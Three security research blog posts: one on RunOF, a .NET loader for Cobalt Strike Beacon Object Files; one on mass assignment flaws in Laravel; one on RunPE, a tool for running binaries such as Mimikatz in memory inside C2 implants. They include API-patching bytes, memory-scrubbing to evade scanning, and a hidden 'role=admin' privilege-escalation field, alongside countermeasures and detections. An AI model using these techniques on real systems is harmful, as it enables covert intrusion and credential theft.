BOFs are, as the name suggests, “object” files, with some conventions for how symbols should be imported so the beacon loader can resolve them dynamically. An object file is something you are most likely to have encountered as an intermediary file when compiling code, typically with a .o extension. When you are developing a C application, for example, there are actually multiple steps happening – often abstracted by the Makefile or other build system that you are using. The first steps are preprocessing and compilation; these take the human-readable code and deal with #defines and #includes before converting it into machine code that can be executed by the processor. The second is linking: this step takes all the outputs of the previous steps and resolves any references between them, before constructing an executable file that allows the operating system to load and execute the binary.

Compilation Process

The object file is the output from the first preprocessing and compilation stage, so it contains unlinked relocatable machine code, along with debugging and other metadata. On Windows (which we’re targeting with RunOF) object files use the Common Object File Format (COFF) which Microsoft documents as part of the PE format (https://docs.microsoft.com/en-us/windows/win32/debug/pe-format).

A COFF file is made up of a collection of headers containing information about the file itself, symbol and string tables, and then a collection of sections that contain the code to be executed, data it needs and information on how to load that data into memory.

Object File Layout

What each section is for is a little out of scope for this article, but the key ones we need to use are:

  • .text: This contains the machine code to be executed.
  • .data: Storage for initialized static variables.
  • .bss: Storage for uninitialized static variables.
  • .rdata: Storage for read-only initialized variables (e.g. constants).
  • .reloc: Information on which bits of the file need to be updated when the load address is known.

As well as sections, an important part of the file we need to parse is the symbol table. This gives the location in the file of functions we have implemented, as well as functions we are expecting to import from other DLLs.

Example Symbol Table

For example, in the screenshot above, we can see the go symbol is located in ‘SECT1’ (which is the .text section), whereas symbols such as __imp_BeaconPrintf are ‘UNDEF’, which means we need to provide them. Normally this would be done by the linker as part of the overall build process outlined above, but we have to do that step in our loader.
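To illustrate the structures involved, the sketch below walks the file header, section headers and symbol table of a COFF object that has already been read into memory, using the definitions from winnt.h. This is an illustrative sketch rather than the RunOF source, and the function name is made up.

#include <windows.h>
#include <stdio.h>

// Dump the sections and symbols of a COFF object; 'base' points to the raw .o file in memory
void dump_coff(unsigned char *base)
{
    PIMAGE_FILE_HEADER hdr = (PIMAGE_FILE_HEADER)base;

    // Section headers follow the file header (object files have no optional header)
    PIMAGE_SECTION_HEADER sections =
        (PIMAGE_SECTION_HEADER)(base + sizeof(IMAGE_FILE_HEADER) + hdr->SizeOfOptionalHeader);
    for (WORD i = 0; i < hdr->NumberOfSections; i++)
        printf("SECT%d %.8s (%lu bytes)\n", i + 1, (char *)sections[i].Name, sections[i].SizeOfRawData);

    // The symbol table location is given in the header; the string table follows it immediately
    PIMAGE_SYMBOL symbols = (PIMAGE_SYMBOL)(base + hdr->PointerToSymbolTable);
    char *strings = (char *)(symbols + hdr->NumberOfSymbols);

    for (DWORD i = 0; i < hdr->NumberOfSymbols; i++) {
        if (symbols[i].N.Name.Short)   // short names (8 chars or fewer) are stored inline
            printf("%.8s -> section %d\n", (char *)symbols[i].N.ShortName, symbols[i].SectionNumber);
        else                           // longer names live in the string table
            printf("%s -> section %d\n", strings + symbols[i].N.Name.Long, symbols[i].SectionNumber);
        i += symbols[i].NumberOfAuxSymbols;   // skip auxiliary records; section number 0 means UNDEF
    }
}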

The loading process follows the following high level steps:

Loading Process

The most complex part of the process is probably resolving the relocation entries. When the code is compiled the compiler doesn’t know where in memory items (such as functions, variables or data) will be located when the application runs – the values could be in other object files, or need to be provided by an operating system API. Therefore, the compiler has a set of architecture-specific rules to choose from that allow it to specify that the address needs to be ‘filled in’ at linking time.

The diagram above shows only a small subset; the full list is quite large. Many appear not to be used in practice (and, for example, tools like Ghidra don’t support them), so we’ve only implemented the ones emitted by the most common compilers. A relocation entry has, in effect, three fields – the symbol the relocation references, the address the relocation is to be applied to and the relocation type. As an example, the last one in the list (IMAGE_REL_AMD64_REL32) means the loader has to find the address of the referenced symbol, calculate a 32-bit relative address from the relocation location to that symbol and write the value to the relocation address.
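As a concrete illustration of that last example, applying an IMAGE_REL_AMD64_REL32 relocation boils down to a small calculation like the sketch below. This is illustrative only: ‘where’ is assumed to be the location inside the mapped section that the relocation points at, and ‘target’ the resolved address of the referenced symbol.

#include <stdint.h>
#include <string.h>

// Apply an IMAGE_REL_AMD64_REL32 relocation: write the 32-bit offset from the
// byte following the patched field to the resolved symbol address.
static void apply_rel32(uint8_t *where, uint8_t *target)
{
    int32_t addend;
    memcpy(&addend, where, sizeof(addend));            // keep any addend already stored at the site

    int64_t delta = (int64_t)(target - (where + 4));   // relative to the end of the 4-byte field

    int32_t value = (int32_t)(delta + addend);         // assumes the symbol is within +/- 2GB
    memcpy(where, &value, sizeof(value));
}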

Once the relocations have been applied, memory permissions set correctly and the entry point located the BOF can be executed.

Getting it done with .NET

We wanted this to run in .NET to give us greater flexibility in how we use it as part of our other C2 tooling. This poses a challenge, since .NET code is managed and executes inside the Common Language Runtime (CLR) rather than running natively. Fortunately, .NET provides functionality for working with unmanaged code, called Interop, that allows us to manipulate native memory to load the BOF and then call a native Windows API function to execute it. We use the same technique as developed for RunPE of launching the code in a new thread, and we install an exception handler to prevent any buggy BOFs from crashing the entire process.

Another challenge we faced was getting any output produced by the BOF back to the .NET parent application so it could be returned down a C2 channel. The Cobalt agent defines a set of Beacon* functions (e.g. BeaconPrintf) that the BOF can call to pass data back to the implant. These need to be implemented as native code for the BOF to be able to call them, and we need a way of passing the data they produce between the native code and the .NET parent. To implement this, we have a small ‘beacon_functions’ COFF file that is loaded by the .NET loader first. This contains implementations of the Beacon* functions that write their output into a buffer that is grown to contain the data output by the BOF. When the actual BOF is loaded, the addresses of the already loaded Beacon* functions can be provided during the symbol resolution step. Once BOF execution completes, the .NET parent can read from the memory buffer to retrieve any output generated.
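A rough sketch of what such a replacement BeaconPrintf might look like in the native ‘beacon_functions’ object is shown below. The buffer handling and variable names here are hypothetical and simplified (a fixed-size buffer rather than a growing one), not RunOF’s actual implementation.

#include <stdarg.h>
#include <stdio.h>

static char  *g_output;    // output buffer supplied by the .NET loader
static size_t g_capacity;  // size of that buffer
static size_t g_used;      // bytes written so far; read back by the loader when the BOF completes

void BeaconPrintf(int type, char *fmt, ...)
{
    // 'type' (e.g. CALLBACK_OUTPUT) is ignored in this simplified sketch
    va_list args;
    va_start(args, fmt);
    int written = vsnprintf(g_output + g_used, g_capacity - g_used, fmt, args);
    va_end(args);

    if (written > 0 && (size_t)written < g_capacity - g_used)
        g_used += (size_t)written;
}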

The final piece of the puzzle is how we provide arguments to the BOF file. In Cobalt, BOFs are loaded with an ‘aggressor’ script that allows you to pass arguments of differing types to the BOF file, where they are retrieved by using the data API defined in beacon.h:

Data API Definition

To allow BOFs to accept arguments in RunOF we have to accept them on the command line of our application, then provide them in a way that can be consumed by the native code once it is loaded. To do this, we serialize them into a shared memory buffer using a custom type, length, value (TLV) format. Our internal implementation of the data API can then read from that buffer when invoked by the BOF:

Argument Serialisation

There are two important caveats to this approach:

  • The arguments must be provided on the command line in the order the BOF is expecting to receive them. You can get this from the aggressor script used to load the BOF, or from looking at the BOF code.
  • The arguments must be provided with the correct type (e.g. Int/Short etc.). Again, this can usually be seen from the aggressor script. In some cases, the aggressor script may itself do some parsing (e.g. converting a DNS lookup type such as A or AAAA into a numeric code for the BOF’s internal use) – in which case you have to provide the internal code.
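Both caveats follow from the way the BOF itself unpacks the buffer: it reads arguments back in a fixed order, with fixed types, using the beacon data API. The sketch below shows a typical consumer; the declarations follow the public beacon.h conventions and the argument names are purely illustrative.

#include <windows.h>

// Normally provided by beacon.h
typedef struct {
    char *original;
    char *buffer;
    int   length;
    int   size;
} datap;

DECLSPEC_IMPORT void  BeaconDataParse(datap *parser, char *buffer, int size);
DECLSPEC_IMPORT char *BeaconDataExtract(datap *parser, int *size);
DECLSPEC_IMPORT int   BeaconDataInt(datap *parser);

void go(char *args, int len)
{
    datap parser;
    BeaconDataParse(&parser, args, len);

    char *hostname = BeaconDataExtract(&parser, NULL);  // first argument must be a string
    int   port     = BeaconDataInt(&parser);            // second argument must be an int
    /* ... use hostname and port ... */
}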

You can see a lot more detail on this in the project README, and the command line help offers a summary:

Command Line Help

Debug Capability

As well as running BOFs, the RunOF project can also be used to help develop new BOF capability. The project files contain a ‘Debug’ build target – if this is used then the loader will pause before executing the BOF to allow a debugger to be attached. You’ll also get lots of information about the loading process itself.

Conclusion

We hope that RunOF gives Red Teamers a way to use existing BOF functionality in other C2 frameworks, and to help develop new and innovative BOF capability. The RunOF project can be found at the link below.

GitHub: https://github.com/nettitude/RunOF

The post Introducing RunOF – Arbitrary BOF tool appeared first on Nettitude Labs.

Explaining Mass Assignment Vulnerabilities

By: Dom Myers
25 January 2022 at 09:00

Programming frameworks have gained popularity due to their ability to make software development easier than using the underlying language alone. However, when developers don’t fully understand how framework functionality can be abused by attackers, vulnerabilities are often introduced.

One commonly used framework feature is known as mass assignment, a technique designed to help match front end variables to their back end fields, for easy model updating.

Implementing mass assignment

We’ll be using PHP/Laravel as an example to demonstrate how mass assignment works via the Laravel framework. Let’s imagine you have a form which allows a user to update some of their profile details, and that form contains the following fields:

<form method="POST" action="/updateuser">
    <input type="text" name="name" />
    <input type="text" name="email" />
    <input type="text" name="address" />
    <input type="text" name="phone" />
    <button type="submit">Signup</button>
</form>

Within the Laravel controller, one way to update those fields would be as follows:

public function updateUser(Request $request)
{
    $user = Auth::user();
    $user->name = $request->post('name');
    $user->email = $request->post('email');
    $user->address = $request->post('address');
    $user->phone = $request->post('phone');
    $user->save();
}

An alternative way to do this would be to take advantage of mass assignment, which would look something like this:

public function updateUser(Request $request)
{
    $user = Auth::user();
    $user->update($request->all());
}

This code updates the User model with the values from the Request (in this case the HTML fields for name, email, address and phone), assuming that the input names match the model’s fields. This saves superfluous lines of code, since all fields can be updated at once instead of being specified individually.

The mass assignment vulnerability

So, how might an attacker exploit this?

As may be evident from the code above, the framework is taking all the input fields from the Request variable and updating the model without performing any kind of validation. Therefore, it’s trusting that all the fields provided are intended to be updateable.

Although the example currently only provides options for updating fields such as name and email, there are usually more columns in the User table which aren’t displayed on the front end. In this case, let’s imagine that there is also a field named role, which determines the privilege of the user. The role field wasn’t displayed in the HTML form because the developers didn’t want users changing their own role.

However, with our understanding that the controller is simply trusting all input provided by the request to update the User model, an attacker can inject their own HTML into the page to add a field for role, simply by using built-in browser tools. This can also be done by intercepting the request using a proxy and appending the field name and value, or by any other technique that allows client side modification.

<form method="POST" action="/updateuser">
    <input type="hidden" name="role" value="admin">
    <input type="text" name="name" />
    <input type="text" name="email" />
    <input type="text" name="address" />
    <input type="text" name="phone" />
    <button type="submit">Signup</button>
</form>

This time, when the controller is reached, the user model will be updated with the expected fields (name, email, address, phone) as well as the additional role field provided.  In this case, the vulnerability leads to privilege escalation.

This particular example demonstrates how mass assignment can be exploited to achieve privilege escalation, however it is often possible to bypass other controls using the same technique. For example, an application might prevent a username from being edited when updating profile information, to ensure integrity and accountability across audit trails. Using this attack, a user could perform malicious actions under the guise of one username before switching to another.

Countermeasures

There are several ways to protect against mass assignment attacks. Most frameworks provide defensive techniques such as those discussed in this section.

The general idea is to validate input before updating the model. The safest way to do this is to partially fall back to the original, more verbose approach of specifying each field individually. This also has the added benefit of allowing additional validation to be applied to each field, beyond ensuring only expected fields are updated.

In Laravel, one way to do this would be as shown below; include some validation such as the maximum number of permissible characters for the name field, and then update the User model with the validated data. As the validate() function lists the exact fields expected, if the role field was appended as demonstrated in our previous sample attack, it would be ignored and have no effect.

public function updateUser(Request $request)
{
    $validatedData = $request->validate([
        'name' => ['required', 'max:255'],
        'email' => ['required', 'unique:users'],
        'address' => ['required'],
        'phone' => ['numeric']
    ]);
    $user = Auth::user();
    $user->update($validatedData);
}

An alternative method is to utilize allow lists and deny lists to explicitly state what fields can and cannot be mass assigned. In Laravel, this can be done by setting the $fillable property on the User model to state which fields may be updated in this way. The code below lists the four original fields from the HTML form, so if an attacker tried to append the role field, since it’s not in the $fillable allow list, it won’t be updated.

class User extends Model
{
    protected $fillable = [
        'name',
        'email',
        'address',
        'phone'
    ];
}

Similarly, deny lists can be used to specify which fields cannot be updated via mass assignment. In Laravel, this can be done using the $guarded property in the model instead. Using the following code would have the same effect as the above, since the role parameter has been deny listed.

class User extends Model
{
    protected $guarded = ['role'];
}

Conclusion

Mass assignment vulnerabilities are important issues to check for during software development and penetration tests because they are often not picked up by automated tools, due to their logic component. For example, a tool is unlikely to have the context to understand whether a user has managed to escalate their privileges via a specially crafted request.

They are also often overlooked by developers, partly due to a lack of awareness of how certain features can be exploited, but also due to pressure to complete projects, since it’s faster to use mass assignment without performing input validation.

It’s important to understand that mass assignment vulnerabilities exist and can be exploited with high impact. A strong software development lifecycle and associated testing regime will reduce the likelihood of these vulnerabilities appearing in code.

The post Explaining Mass Assignment Vulnerabilities appeared first on Nettitude Labs.

Introducing Process Hiving & RunPE

By: Rob Bone
2 September 2021 at 09:00
Process Hiving Cover 2

Download our whitepaper and tool

This blog is a condensed version of a whitepaper we’ve released, called “Process Hiving”.  It comes with a new tool too, “RunPE”.  You can download these at the links below.

Whitepaper

Our process hiving whitepaper can be downloaded here.

Tool

RunPE, our accompanying tool, can be downloaded from GitHub.

High quality red team operations are research-led. Being able to simulate current and emerging threats at an accurate level is of paramount importance if the engagement is going to provide value to clients.

One common use case for offensive operations is the requirement to run native executable files or compiled code on the target and in memory. Loading and running these files in memory is not a new technique, but running executables as secondary modules within a Command & Control (C2) framework is rarer, particularly those that support arguments from the host process.

This blog introduces an innovative technique and a must-have tool for the red team arsenal. RunPE is a .NET assembly that uses a technique called Process Hiving to manually load an unmanaged executable into memory along with all its dependencies, run that executable with arguments passed at runtime while capturing any output, and then clean up and restore memory to hide any trace that it was run.

What is it?

The aim of this project is to develop a .NET assembly that provides a mechanism for running arbitrary unmanaged executables in memory. It should allow arguments to be provided, load any libraries that are required by the code, obtain any STDOUT and STDERR from the process execution, and not terminate the host process once the execution of the loaded PE finishes.

This .NET assembly must be able to be run in the normal way in C2 frameworks, such as by execute-assembly in Cobalt Strike or run-exe in PoshC2, in order to extend the functionality of those frameworks.

Finally, as this is to all take place in an implant process, any artefacts in memory should then be cleaned up by zeroing out the memory and removing them or restoring original values in order to better hide the activity.

We’re calling this technique of running multiple PEs from the within the same process ‘Process Hiving’ and the result of this work is the .NET assembly RunPE. In essence this technique:

  • Receives a file path or base64 blob of a PE to run
  • Manually maps that file into memory without using the Windows Loader in the host process
  • Loads any dependencies required by the target PE
  • Patches memory to provide arguments to the target PE when it is run
  • Patches various API calls to allow the target PE to run correctly
  • Replaces the file descriptors in use to capture output
  • Patches various API calls to prevent the host process from exiting when the PE finishes executing
  • Runs the target PE from within the host process, while maintaining host process functionality
  • Restores memory, unloads dependencies, removes patches and cleans up artefacts in memory after executing

Loading the PE

The starting point for the work was @subtee‘s .NET PE Loader utilised in GhostPack’s SafetyKatz. This .NET PE Loader already mapped a PE into memory manually and invoked the entry point; however, a few issues remained that prevented its use in an implant process. SafetyKatz uses a ‘slightly modified’ version of Mimikatz as the target PE, modified critically so that it does not require arguments or exit the process upon completion.

The first step then was to re-use as much of this work as possible and rewrite it to suit our needs – no need to reinvent the wheel when a lot of great work was already done. The modified loader manually maps the target PE into memory, performs any fixups and then loads any dependency DLLs that are not already loaded. The Import Address Table for the PE is patched with the locations of all the libraries once they are loaded, mimicking the real Windows loader.

Patching Arguments

In a Windows process a pointer to the command line arguments is located in the Process Environment Block (PEB) and can be retrieved directly or, more commonly, using the Windows API call GetCommandLine. Similarly, the current image name is also stored in the PEB. With RunPE, the command line and image name are backed-up for when we reset during the clean-up phase and then replaced with the new values for the target PE.

Patching the Command Line in the PEB
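For reference, the sketch below shows where those values live in the PEB on x64, using the partial structure definitions from winternl.h and the __readgsqword compiler intrinsic. RunPE reads and rewrites the same fields from C# via Interop rather than with native code like this.

#include <windows.h>
#include <winternl.h>
#include <intrin.h>
#include <stdio.h>

int main(void)
{
    // On x64 the PEB pointer is held at gs:[0x60]
    PPEB peb = (PPEB)__readgsqword(0x60);
    PRTL_USER_PROCESS_PARAMETERS params = peb->ProcessParameters;

    // UNICODE_STRING lengths are in bytes, so halve them for character counts
    wprintf(L"Image name:   %.*ls\n", (int)(params->ImagePathName.Length / 2), params->ImagePathName.Buffer);
    wprintf(L"Command line: %.*ls\n", (int)(params->CommandLine.Length / 2), params->CommandLine.Buffer);
    return 0;
}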

Preventing Process Exit

Another issue with running vanilla PEs in this way is that when they finish executing, the PE inevitably tries to exit the process, for example by calling TerminateProcess.

Similarly, as the RunPE process is .NET, the CLR also tries to shut down once process termination is initiated, so even if TerminateProcess is prevented CorExitProcess will cause any .NET implant to exit.

To circumvent this, a number of these API calls are patched to instead jmp to ExitThread. As the entry point of the target PE is run in a new thread, this means that once it has finished it will gracefully exit that thread only, leaving the process and the CLR intact.

These API calls are patched with bytes that use Return Oriented Programming (ROP) to instead call ExitThread, passing an exit code of 0.

ExitThread Patch Bytes

An example of this patch if the ExitThread function was located at 0x1337133713371337 is below:

0: 48 c7 c1 00 00 00 00 mov rcx, 0x0 // Move 0 into rcx for exit code argument
7: 48 b8 37 13 37 13 37 movabs rax, 0x1337133713371337 // Move address of ExitThread into rax
e: 13 37 13
11: 50 push rax // Push rax onto stack and ret, so this value will be the 'return address'
12: c3 ret

We can see this in x64dbg while RunPE is running, viewing the NtTerminateProcess function and noting it has been patched to exit the thread instead.
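Expressed as native code rather than the C# Interop code RunPE actually uses, assembling that patch at run time is essentially the following sketch. The byte layout matches the listing above, the ExitThread address is filled in dynamically, and the function and parameter names are illustrative.

#include <stdint.h>
#include <string.h>

// Build the mov rcx,0 / movabs rax,&ExitThread / push rax / ret patch (19 bytes)
// and write it over the start of the API function being patched.
static void patch_to_exit_thread(uint8_t *target, uint64_t exit_thread_addr)
{
    uint8_t patch[] = {
        0x48, 0xC7, 0xC1, 0x00, 0x00, 0x00, 0x00,        // mov rcx, 0 (thread exit code)
        0x48, 0xB8, 0, 0, 0, 0, 0, 0, 0, 0,              // movabs rax, <address of ExitThread>
        0x50,                                            // push rax
        0xC3                                             // ret -> 'returns' into ExitThread
    };
    memcpy(&patch[9], &exit_thread_addr, sizeof(exit_thread_addr)); // fill in the address
    memcpy(target, patch, sizeof(patch));                           // assumes the page is writable
}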

Fixing APIs

Several other API calls also required patching with new values in order for PEs to work. One example is GetModuleHandle which, if called with a NULL parameter, returns a handle to the base of the main module. When a PE calls this function it is expecting to receive its base address, however in this scenario the API call will in fact return the host process’ binary’s base address, which could cause the whole process to crash, depending on how that address is then used.

However, GetModuleHandle could also be called with a non-NULL value, in which case the base address of a different module will be returned.

GetModuleHandle is therefore hooked and execution jumps to a newly allocated area of memory that performs some simple logic; returning the base address of the mapped PE if the argument is NULL and rerouting back to the original GetModuleHandle function if not. As the first few bytes of GetModuleHandle are overwritten with a jump to our hook, those overwritten instructions must be executed in the hook before jumping back into the GetModuleHandle function, returning execution to just after the hook jump.

As with the previous API patches, these bytes must be dynamically built in order to provide the runtime addresses of the hook location, the GetModuleHandle function and the base address of the target PE.

GetModuleHandle Hook
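The logic that the dynamically built hook stub implements is, in effect, the following. It is shown here as C for clarity; the real stub is generated as raw bytes at runtime, and the names below are illustrative.

#include <windows.h>

static HMODULE g_mapped_pe_base;                            // base address of the manually mapped target PE
static HMODULE (WINAPI *g_real_GetModuleHandleA)(LPCSTR);   // original function, entered past the hook jump

HMODULE WINAPI hooked_GetModuleHandleA(LPCSTR lpModuleName)
{
    if (lpModuleName == NULL)
        return g_mapped_pe_base;                   // pretend the mapped PE is the main module

    return g_real_GetModuleHandleA(lpModuleName);  // otherwise defer to the real implementation
}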

As an additional change the PEB is also updated, replacing the base address with that of the target PE so that if any programs retrieve this address from the PEB directly then they get the expected value.

At this point, the target PE should be in a position to be able to run from within the host process by calling the entry point of the PE directly. However, as the intended use case is to be able to use RunPE to execute PEs in memory from with an implant, it is a requirement to be able to capture output from the program.

Capturing Output

Output is captured from the target process by replacing the handles to STDOUT and STDERR with handles to anonymous pipes using SetStdHandle.

Replacing Standard Output Handles
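Conceptually this is the same as the native sketch below, which RunPE performs from .NET via P/Invoke; the function name here is illustrative.

#include <windows.h>

// Point STDOUT at the write end of an anonymous pipe; the read end is handed
// to a reader thread so output can be collected and returned down C2.
BOOL redirect_stdout(HANDLE *read_end)
{
    HANDLE write_end = NULL;
    SECURITY_ATTRIBUTES sa = { sizeof(sa), NULL, TRUE };

    if (!CreatePipe(read_end, &write_end, &sa, 0))
        return FALSE;

    return SetStdHandle(STD_OUTPUT_HANDLE, write_end);
}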

Just before the target PE entry point is invoked on a new thread, an additional thread is first created that will read from these pipes until they are closed. In this way, the output is captured and can be returned from RunPE. The pipes are closed by RunPE after the target PE has finished executing, ensuring that all output is captured.

Clean Up

As Process Hiving includes running multiple processes from within one, long-running host process it is important that any execution of these ‘sub’ processes includes full and proper clean up. This serves two purposes:

  • To restore any changed state and functionality in order to ensure that the host process can continue to operate normally.
  • To remove any artefacts from memory that may trigger an alert if detected through techniques such as in-memory scanning, or aid an investigator in the event of a manual triage.

To achieve this, any code change made by RunPE is stored during execution and restored once execution is complete. This includes API hooks, changed values in memory, file descriptors, loaded modules and of course the mapped PE itself. In the case of any particularly sensitive values, such as the command line arguments and mapped PE, the memory region is first zeroed out before it is freed.

Memory Clean Up
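For the sensitive regions, the clean-up is conceptually equivalent to the short native sketch below (illustrative only; RunPE performs the equivalent calls through Interop).

#include <windows.h>

// Zero a sensitive allocation before handing it back to the OS
void scrub_and_free(PVOID region, SIZE_T size)
{
    SecureZeroMemory(region, size);        // ensure the contents cannot be recovered from memory
    VirtualFree(region, 0, MEM_RELEASE);   // then release the whole allocation
}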

Demonstration

An example of RunPE running unchanged and up-to-date Mimikatz is below, alongside Procmon process activity events for the process.

RunPE Running Mimikatz with Procmon Process Activity

Note that there are no sub-processes created, and Mimikatz runs successfully with the provided arguments.

Running a debug build provides more output and allows us to verify that the artefacts are being removed from memory, hooks are being restored, and so on. We can see below that after the clean-up has occurred, the ‘new’ DLLs loaded for Mimikatz have either already been cleaned up by Mimikatz itself (the error code 126) or are freed by RunPE, and are no longer visible in the Modules tab of Process Hacker.

Module Clean Up in Debug Output

Similarly, the original code on the hooks such as NtTerminateProcess has been restored, which we can verify using a debugger such as x64dbg as below.

Restored NtTerminateProcess in x64dbg

As Mimikatz.exe is unlikely to exist in the target environment during red team operations, RunPE also supports loading binaries from base64 blobs so that they can be passed with arguments down C2 channels. Long, triple-dash switches are used in order to avoid conflicts with any arguments to the target PE.

Loading a Base64 Encoded PE

An example of this from a PoshC2 implant below demonstrates the original use case. The implant host process of netsh.exe loads and invokes the RunPE .NET assembly which in turn loads and runs net.exe in the host process with arguments. In this case net.exe is passed as a base64 blob down C2.

Running net.exe from a PoshC2 Implant

Known Issues & Further Work

There are a number of known issues and caveats with this work in its current state which are detailed below.

  • RunPE only supports 64-bit (x64) native Windows PE files.
  • During testing, any modern PE compiled by the testers has worked without issues; however, issues remain with a number of older Windows binaries such as ipconfig.exe and icacls.exe. Research is ongoing into which specific characteristics of these files cause issues.
  • If the target PE spawns sub-processes itself then those are not subject to Process Hiving and will be created in the normal fashion. It is up to the operator to understand the behaviour of the target PE and any other considerations that should be made.
  • RunPE presently calls the entry point of the target PE on a new thread and waits for that thread to finish, with a timeout. If the timeout is reached or if the target PE manipulates that thread, this is undefined behaviour.
  • PEs compiled without ASLR support, such as those built with MinGW by default, do not currently work.

Additionally, further work can be made on RunPE to improve the stealth of the Process Hiving technique:

  • Dependencies of the target PE can be mapped into memory using the same PE loader as the target PE itself and not using the standard Windows Loader. This would bypass detections on API calls such as LoadLibrary and GetProcAddress as well as any hooks placed in those modules by defensive software.
  • For any native API calls that remain, the use of syscalls directly can be explored to achieve the same ends for the same reasons as described above.

Detections

For Blue Team members, the best way to prevent this technique is to prevent the attacker from reaching this stage in the kill chain. Delivery and initial execution for example likely provide more options for detecting an attack than process self-manipulation. However, a number of the actions taken by RunPE can be explored as detections.

  • SetStdHandle is called six times per RunPE invocation: once each to point STDOUT, STDERR and STDIN at anonymous pipes, and then once each again to reset them. Cursory monitoring of a range of processes on the author’s own machine did not show any invocations of this API call as part of standard use, so this activity could potentially be used to detect RunPE.
  • A number of APIs are hooked or modified and then restored as part of every RunPE run, such as GetCommandLine, NtTerminateProcess, CorExitProcess, RtlExitUserProcess, GetModuleHandle and TerminateProcess. Continued modification of these Windows API calls in memory is not likely to be common behaviour, making it a potential avenue for detection.
  • Similarly, the PEB is also continually modified as the command line string and image name are updated with every invocation of RunPE.
  • While the source code can be obfuscated, any attempt to load the default RunPE assembly into a .NET process provides a strong opportunity for detection.

Conclusion

At its core, Process Hiving is a fairly simple process. A PE is manually mapped into memory using existing techniques and a number of changes are made to API calls and the environment so that when the entry point of that PE is invoked it runs in the expected way.

We hope that this technique and the tool that implements it will allow Red Teams to be able to quickly and easily run native binaries from their implant processes without having to deal with many of the pain points that plague similar techniques that already exist.

The source code for RunPE is available at https://github.com/nettitude/RunPE and any further work on the tool can be found there. Contributions and collaboration are also welcome.


The post Introducing Process Hiving & RunPE appeared first on Nettitude Labs.
